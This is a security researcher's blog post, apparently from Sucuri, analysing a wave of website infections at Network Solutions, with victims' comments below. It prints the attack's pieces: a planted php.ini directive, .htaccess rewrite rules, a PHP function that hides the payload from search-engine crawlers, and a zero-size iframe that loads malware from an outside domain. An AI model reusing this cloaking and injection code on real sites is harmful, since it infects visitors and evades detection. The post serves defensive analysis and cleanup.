New infections today at Network Solutions

Update: We just heard back from Network solutions and they explained the issue to us. It is also related to the US Treasury Department hack, because they are hosting at Netsol and got infected too.

On their own words: “This past weekend, an application that we support on our hosting platform was exploited as we were in the process of fixing it. We believe we have fixed the issue and we were able to contain the number of potentially affected websites to less than 250.

So the problem seems to be fixed and only 250 sites got hacked. Not too bad for a company of their size.

I also have to point out that Network Solutions response to this (and to the previous) incident was very good. They took responsibility, kept everyone updated and worked hard to fix the sites involved. There is never going to be a perfect secure hosting solution (bugs happen), but being able to respond quickly is what we always want to see.

Yes, I am tired of reporting those as you are probably tired of hearing them as well. But today we got reports from multiple site owners of new infections at Network Solutions. Some of them were using WordPress, but some were not. So nobody can blame WordPress this time.

In fact, we just finished fixing a few of these sites and we have some info to share.

*btw, some of them were hacked on the previous batch, but some were not. No correlation here.

**I am not 100% sure of how this is happening. Different sites, different platforms, most of them updated. The only thing weird is that their cgi-bin had the drwxrws–x (suid bit checked). I will post an update when I get more info.

Attack analysis

This attack is happening in two ways:

1- A new php.ini is created inside the cgi-bin directory. It looks like this:

auto_append_file = /data/xx/yy//user/abc/cgi-bin/root

2- A new .htaccess is created (or modified) to load a new php file:

RewriteRule ^(.*)\.html$ /data/xx/user/yy/htdocs/file.php [L]
RewriteRule ^(.*)\.htm$ /data/xx/user/yy/htdocs/file.php [L]

Note that I am hiding the original paths to protect the innocent. Also, the “file.php” from the second case had different file names on each case.

The “root” file inside the cgi-bin looks like the “counter.cgi” that we saw previously.

The file.php is very interesting and you can see the full content here: http://sucuri.net/malware/MW:GREPADD:2. It not only checks if the request is coming from a bot, but also the operating system (Linux, FreeBSD, etc) and only displays the malware on certain cases:

function detect_os() {
global $os;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if ((eregi("Google", $user_agent))
or (eregi("gsa-crawler", $user_agent))
or (eregi("Yahoo", $user_agent))
or (eregi("msnbot", $user_agent))
or (eregi("Turtle", $user_agent))
or (eregi("Yandex", $user_agent))
or (eregi("YaDirectBot", $user_agent))
or (eregi("Rambler", $user_agent))
or (eregi("James Bond", $user_agent))
or (eregi("Ask Jeeves", $user_agent))
or (eregi("Baiduspider", $user_agent))
or (eregi("EltaIndexer", $user_agent))
or (eregi("GameSpyHTTP", $user_agent))
or (eregi("grub-client", $user_agent))
or (eregi("Slurp", $user_agent))
or (eregi("Pagebull", $user_agent))
or (eregi("Scooter", $user_agent))
or (eregi("Nutch", $user_agent))
or (eregi("Zeus", $user_agent))
or (eregi("WebAlta", $user_agent))
or (eregi("Wget", $user_agent))
or (eregi("bot", $user_agent))
or (eregi("ia_archiver", $user_agent)))
{$os = "Bots";}
elseif (ereg("Windows 95", $user_agent)) $os = "Windows 95";
elseif (ereg("Windows NT 4", $user_agent)) $os = "Windows NT 4";
elseif (ereg("Windows 98", $user_agent)) $os = "Windows 98";
elseif (ereg("Win 9x 4.9", $user_agent)) $os = "Windows ME";
elseif (ereg("Windows NT 5.0", $user_agent)) $os = "Windows 2000";
elseif (ereg("Windows NT 5.1", $user_agent)) $os = "Windows XP";
elseif (ereg("Windows NT 5.2", $user_agent)) $os = "Windows 2003";
elseif (ereg("Windows NT 6.0", $user_agent)) $os = "Windows Vista";
elseif (ereg("Windows NT 6.1", $user_agent)) $os = "Windows 7";
elseif (ereg("Windows CE", $user_agent)) $os = "Windows CE";
elseif (ereg("iPhone", $user_agent)) $os = "iPhone OS";
elseif (ereg("Symbian", $user_agent)) $os = "Symbian OS";
elseif (ereg("Linux", $user_agent)) $os = "Linux";
elseif (ereg("SunOS", $user_agent)) $os = "SunOS";
elseif (ereg("FreeBSD", $user_agent)) $os = "FreeBSD";
elseif (ereg("NetBSD", $user_agent)) $os = "NetBSD";
elseif (ereg("PPC;", $user_agent)) $os = "Pocket PC";
elseif ((ereg("PPC", $user_agent)) or (eregi("Mac_PowerPC", $user_agent))) $os = "Power PC";
elseif (ereg("Mac OS", $user_agent)) $os = "Mac OS";
elseif (eregi("PlayStation", $user_agent)) $os = "PlayStation";
elseif (ereg("Nintendo Wii", $user_agent)) $os = "Nintendo Wii";
elseif (ereg("Nitro", $user_agent)) $os = "Nintendo DS";
elseif (ereg("J2ME/MIDP", $user_agent)) $os = "Mobile phone";
else $os = "Unknown OS :(";

At the end both show the same iframe to load malware:

document.write('<iframe frameborder="0" onload="">
if (!this.src){ this.src="http://grepad.com/in.cgi?2"; this.height=0; this.width=0;} \'</iframe>

If you got infected, look at your php.ini or .htaccess file and remove the bad entries. If you are not sure, use our scanner to check it out.

Have more information? Let us know!

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Anonymous

    We got infected.

    This is the WILDLY HELPFUL response from Network Solutions:

    I am sorry to hear that you were experiencing an issue with malware on you website. I have removed the offending code and the file to which it was linking. I have also enabled the raw access logs on your hosting package so, if this occurs again, we can gain insight into how it may have happened. You may also want to reset your FTP password and use sFTP rather than regular FTP as this change was made after the last time your FTP password was reset.

  • Anonymous

    This is getting ridiculous.

  • Anonymous

    Any chance these installations are customers who haven't logged into their accounts and checked or updated their blogs since January. Or even last year?

    This is a big concern for those of us trying to operate professional and secure blogs.

  • Anonymous

    A new .htaccess is created

    That's not a good sign at all. How are they inserting this stuff into shared hosting accounts? This is crazy.

  • Anonymous

    We just got infected… Such a nightmare, Network Solutions is awful…

    This is coming off last week where we were not receiving email for a full day.

  • Anonymous

    Plenty of tips here to clean up ones site, but there doesn't seem to be any info out there for us simple websurfers that started to see the fazher.com redirect. And the application data/mozilla directory being (re-)created and seeing some malicious files in said directory that norton can't remove. Malwarebyte seems to delete these files, but they may return (previously deleted the mozilla directory in documents and settings' application data directory manually to see them return).

    So any instructions to affected websites' visitors?

    What are the effects of this trojan? Does it send out spam or other malious data, that will lead to your ISP cutting you of?

  • Anonymous

    Plenty of tips here to clean up ones site, but there doesn't seem to be any info out there for us simple websurfers that started to see the fazher.com redirect. And the application data/mozilla directory being (re-)created and seeing some malicious files in said directory that norton can't remove. Malwarebyte seems to delete these files, but they may return (previously deleted the mozilla directory in documents and settings' application data directory manually to see them return).

    So any instructions to affected websites' visitors?

    What are the effects of this trojan? Does it send out spam or other malious data, that will lead to your ISP cutting you of?

  • Anonymous

    So any instructions to affected websites' visitors?

    Duck and cover. That's about all I can think off at this point. Other then maybe consider a safer and possibly more lucrative venture such as raising earthworms or bees.

  • Anonymous

    Whats the bottom line here guys is this all out cyber warfare against NS and GD and us little guys are basically powerless to do anything.

    Seriously whats going on here? They even hit the U.S. Treasury sites on NS now.

  • Anonymous

    Are we fixed yet?

  • Anonymous

    Diagnostic page for AS6245
    The last time Google tested a site on this network was on 2010-05-05, and the last time suspicious content was found was on 2010-05-05.

    Still contaminated obviously.

  • Anonymous

    You need to scan your computers. Checking your own websites will give you trojans. I've discovered 8 new ones since the week of April 18.

    twitters.class
    mailvue.class
    skypeqd.class
    ifology.class

    uutecwv.class
    hirwfee.class
    hiydcxed.class
    hieeyfac.class

    They we're downloaded in sets of four. One set on the first day I was hacked. And the second set the second day I was hacked. Either I downloaded these with backups I made of my site or they downloaded and got past my firewall as I was checking out and clicking through the pages on my sites.

  • Anonymous

    I wouldn't say their response has been acceptable let alone good.

    During the initial round of hacks, they emphatically blamed the issue on WordPress and now are using backups to "restore" clients sites that may or may not have been hacked, the backups which do not include all of the files which I now need to re-create for a client.

    To top it all off, I can't even log onto their server at this time.

    Yes, no hosting company can be 100% secure but this has gotten past ridiculous.

  • Anonymous

    Yes, no hosting company can be 100% secure but this has gotten past ridiculous.
    ………..

    I've been working 24/7 since Late April just trying to keep things together. Looks like I only have one options. Ask them to "reprovision" my account, to recreate it as though it is brand new and start from scratch.

    All my work seems to be hopelessly screwed up.

  • Anonymous

    Okay,

    Now that it's obvious my entire development project (3 months work) has been basically destroyed.

    Whats the solution? Do I need to go to VPS to have at least some basic protection?

  • Anonymous

    Mails not working. Try to send mail from my contact page and it vanishes into thin air.

  • Anonymous

    If the US Treasury Department got hacked at Network Solutions no one is 100% safe. I have been going insane since April 19. After the site gets cleaned 72 hrs later the site gets hacked again. On my last cleaning I did found multiple .htaccess files that were compromised including one inside the raw access logs and awstats folder, I did disable these features deleted the .htaccess files and changed the ftp password ASAP, I mean ASAP, plus re-set file permissions. The site has not been attacked in 3 days so I am keeping my fingers crossed.

  • Anonymous

    I have been going insane since April 19.

    Welcome to the club. At this rate I'll be lucky if my wife doesn't divorce me over this fiasco.
    I'm have afraid to even go to my own site anymore for fear something might jump out of the screen at me.

  • Anonymous

    I got a brand new .htaccess attack this morning (this is my 3rd in two weeks)

  • Pingback: fseek.me » Blog Archive » Reviewing host companies – Which one is more secure? - The fseek() function sets the file position indicator for the stream pointed to by stream.()